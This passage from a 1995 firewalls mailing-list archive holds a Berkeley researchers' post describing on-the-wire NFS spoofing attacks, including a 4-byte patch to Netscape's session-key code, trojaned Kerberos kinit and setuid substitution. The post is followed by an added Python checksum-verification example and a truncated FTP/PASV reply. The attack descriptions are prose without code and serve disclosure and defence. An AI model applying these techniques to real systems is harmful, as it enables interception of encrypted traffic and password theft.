in most environments. Although we use on-the-wire patching to compromise
executables, the client binaries can also be compromised during download, by
on-the-wire patching of FTP or HTTP transfers. Trojan horses and viruses could
also patch the client software after it's on the local disk, especially on
systems like Windows 95 that do not provide access control for files.

Given that these are realistic threats, we believe that these issues must be
resolved before internet security and commerce are realistic.

-------------------------------------------------------------------------------

We began to consider in more detail some fundamental weaknesses of common
network security practices that would lead to trivial further attacks on
Netscape as well as many other security tools like Kerberos.

It was our goal to demonstrate that it is trivially possible to patch
executables on-the-wire to completely compromise their security. In doing so,
we hope to reinforce the point that security is an end-to-end problem that is
far harder than getting the protocols correct. Strong, correct protocols only
make more subtle endpoint attacks more likely, especially in light of the
potential for financial gain as the amount of commerce on the Internet
increases.

Most of the attacks we discuss are suitable for the systematic exploitation
of large groups of users: an entire organization, or even a large fraction of
the user base of a particular piece of software.

In many computing environments a pool of common executables, like the Netscape binary, is provided to clients by a fileserver. In such systems, including NFS, AFS and Windows NT, there is no authentication of the file contents sent between clients and servers. In these systems there are provisions for sophisticated access checks to determine file permissions, at open or handle lookup time. But the file contents that are read from the server are not authenticated in any secure way. The client has no way to determine if the bytes are indeed being sent by the server.

Our first attack model is one in which the attacker has (promiscuous) network access to any machine on any ethernet subnet between the fileserver and the clients under attack. In under a day we produced software that can exploit the lack of authentication in NFS to patch the object code of any executable on-the-wire as it travels between the NFS server and the client machine.

The technical details of the attack are rather simple. To retrieve data from the NFS server a client sends a short request message detailing which block from the file it is interested in (where a block is a range of bytes). The attack software is located on an ethernet segment between the client and the NFS server, so is able to snoop this traffic. The attack software snoops, waiting for any request for a particular block of a particular executable; for example, the block containing the session-key generation code in the Netscape executable. It is then able to forge a reply from the NFS server and transmit it to the client. If the forged packet reaches the client before the legitimate reply, it is accepted and the legitimate reply is discarded as a duplicate. There is obviously a race condition between the injection of the forged response and the true response. Since the attacking software is focused solely on this task, while the fileserver is certainly servicing requests from many clients, it stands a very good chance of winning the race. We have observed that the attacking software wins the race a large fraction of the time.

Given this ability it becomes possible to compromise the security features of any executable loaded from the network. We have examined the Netscape v1.1N executable and located the code that selects the session key. By patching only 4 bytes we were able to cause the selection of a predictable session key every time the browser engages in the SSL protocol. It is then trivial to snoop and decrypt all traffic from the browser to secure servers, obtaining credit card numbers or other private information.

Since this is really an attack on the client, it is not limited to the Netscape browser. On the contrary, it is extremely widely applicable. An appropriate patch to the Kerberos kinit executable makes possible the compromise of any passwords entered by users, and therefore all of the authentication facilities provided by Kerberos. In many environments, including our own here at UC Berkeley, all the Kerberos application binaries are served from an NFS server. This represents a major flaw in security as our attack demonstrates. Having authenticated file services (kerberized NFS or AFS) is useless if the integrity of the kinit executable cannot be ensured (most easily by obtaining it from local disk).

However, making local copies of crucial binaries is not sufficient in the face of a more serious set of variants on the NFS spoofing attack. The spoofing software can be placed as before, in a position to snoop requests to the NFS server. As clients issue a lookup filehandle request the spoofing software can return the handle to a different executable and also forge its attributes. By tricking users into executing code that is setuid root, unlimited access to the client's workstation can be obtained easily.

It is possible to mount NFS partitions so that setuid root executables will not be honored by the client. Still, the spoofing software can make arbitrary NFS filehandle lookup requests succeed, and substitute a trojan of some sort. The attacker could cause misspellings of commonly executed commands to appear to succeed, or could spoof other files that are trusted by the operating system. For example, the user's .login file is a natural and easy target from which to leverage further damage.

This implies that it is unsafe to execute any program obtained via an insecure channel to an NFS server, no matter what the privilege level of the client user. Neither is it limited to NFS or file-serving protocols in particular. Protocols based on TCP, rather than UDP, are just as vulnerable. It is possible to hijack non-authenticated TCP connections, although it is somewhat more complicated.

Attacks based on spoofing traffic coming from the distribution site of popular software packages are also possible. Berkeley, for example, is a mirror site for the Netscape browser. Any student with promiscuous network access on a machine between the ftp server and the main link to the larger Internet could have installed similar patching software to patch the huge number of copies of the binary that were retrieved from server.berkeley.edu.

More mundane attacks based on trojan horses or viruses remain viable today. These attacks must exploit some other weakness in a system's security to infiltrate, but once in place they can perform patches to local binaries to fully compromise a system. Previously such attacks were mostly motivated only by ego or malice; it is now more valuable to compromise a client invisibly, so that the user believes the system is secure. Thus, unlike traditional viruses, the new strains will aim to have no visible effect on the system, thus making them difficult to detect and easy to spread unintentionally. Our patch of Netscape has this flavor.

We realize that it is impossible to eliminate all security holes; one can always question whether it is safe to trust the hardware, or whether outside channels used for communication of public keys or checksums are truly secure, etc. Fortunately, in practice it should suffice to handle far less than all of these risks. We hope to have demonstrated one gaping hole in practical security today, and to have highlighted the problem of the trusted endpoint.

There is one simple step that we can suggest that would go a long way towards improving the security of endpoints. Increasing the practice of software providers widely publishing cryptographically secure checksums of their executables would be extremely helpful. A small amount of paranoia and care must be applied to securing the executables used in the verification process. A read-only floppy disk would be appropriate to hold the verification software, for example.

We are concerned that security on users' workstations and PCs is currently insufficient. When real money is at stake, endpoint security must withstand greater scrutiny.

In summary, protecting the communications channel doesn't help if the endpoints can be subverted. We implemented and discussed several related attacks that replace legitimate programs by compromised versions. Until we can trust every program that executes between the time we boot and the time we finish the secure protocol, we cannot reliably authenticate anything. Today there is no basis for this trust.
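An endpoint check of the kind the authors recommend, added here as an example (it is not code from the original post): executables are compared against a manifest of provider-published digests, so a binary patched on the wire or on disk shows up as a mismatch. SHA-256 is an assumed stand-in for "cryptographically secure checksum", and the file names, manifest format and 4-byte patch are constructed for the demonstration.

```python
import hashlib
import os
import tempfile

# Added example, not code from the original post. A manifest maps each
# executable path to the digest its provider published; SHA-256 is an
# assumed choice of digest. The verifier itself must be run from trusted
# media (the post's read-only floppy), or it is just one more endpoint
# binary that could have been patched.

def sha256_of(path, chunk=65536):
    """Digest a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def verify_manifest(manifest):
    """manifest: {path: expected_hex_digest}.
    Returns {path: "ok" | "MISMATCH" | "MISSING"}. Anything other than "ok"
    means the binary must not be run until replaced from a known-good source."""
    results = {}
    for path, expected in manifest.items():
        if not os.path.isfile(path):
            results[path] = "MISSING"
        elif sha256_of(path) == expected.lower():
            results[path] = "ok"
        else:
            results[path] = "MISMATCH"
    return results

def demo():
    """Constructed scenario: a stand-in 'netscape' binary, a copy with 4 bytes
    overwritten (the size of change the post describes), and a manifest entry
    for a 'kinit' that was never installed."""
    d = tempfile.mkdtemp()
    good, patched, missing = (os.path.join(d, n)
                              for n in ("netscape", "netscape.patched", "kinit"))
    body = bytes(range(256)) * 64          # constructed stand-in for object code
    with open(good, "wb") as f:
        f.write(body)
    with open(patched, "wb") as f:         # same length, 4 bytes changed at offset 1000
        f.write(body[:1000] + b"\x00\x00\x00\x00" + body[1004:])
    published = sha256_of(good)            # the digest a provider would publish
    return verify_manifest({good: published, patched: published, missing: published})

if __name__ == "__main__":
    for path, status in demo().items():
        print(f"{status:9s} {path}")
```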
Eric Brewer, brewer@cs.berkeley.edu
Paul Gauthier, gauthier@cs.berkeley.edu
Ian Goldberg, iang@cs.berkeley.edu
David Wagner, daw@cs.berkeley.edu

A copy of this post is available as http://http.cs.berkeley.edu/~gauthier/endpoint-security.html

From firewalls-owner Mon Oct 16 15:43:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA23274 for firewalls-outgoing; Mon, 16 Oct 1995 15:41:11 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA23267 for ; Mon, 16 Oct 1995 15:41:06 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA07991; Tue, 17 Oct 1995 08:34:15 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma007983; Tue Oct 17 08:33:44 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA15859; Tue, 17 Oct 1995 08:39:51 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9510162239.AA15859@citecub.citec.qld.gov.au>
Subject: Re: Various FTPs
To: wbunting@ch.inri.com (Bill Bunting)
Date: Tue, 17 Oct 95 8:39:50 EST
Cc: firewalls@greatcircle.com
In-Reply-To: <199510161348.JAA01522@hatteras.ch.inri.com>; from "Bill Bunting" at Oct 16, 95 9:48 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 1501
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My mailer thinks Bill Bunting said:
> [irrelevant stuff deleted]
>
>
> >Why doesn't PASV do the trick?
> >
> >Colin
> >
>
>
>
> Here is a clip from an earlier posting of mine. The problem is how to do FTP when both sides require PASV as is the case with many firewalls. (i.e. firewall to firewall FTP is the problem)
>
> Internal users are allowed to use FTP to login to non firewall protected sites using passive FTP. However, in order to have an FTP session, one of the two sides must allow arbitrary port connections. If two firewall protected sites want to talk FTP, one of the two sides must allow arbitrary ports. With our firewall, this is not allowed.
>
> Here is what it looks like (To simplify, TIS fwtk proxy not shown):
>
> Client tries passive mode...
> C-|----------21-control-connection---|-> S
> C-|---21---PASV Command--------------|-> S
> C-|------arbitrary-port-for-data---->| S (blocked by server side firewall)
>
> Client tries PORT command....
> C-|----------21-control-connection---|-> S
> C-|---21-PORT--Command---------------|-> S
> C |<------arbitrar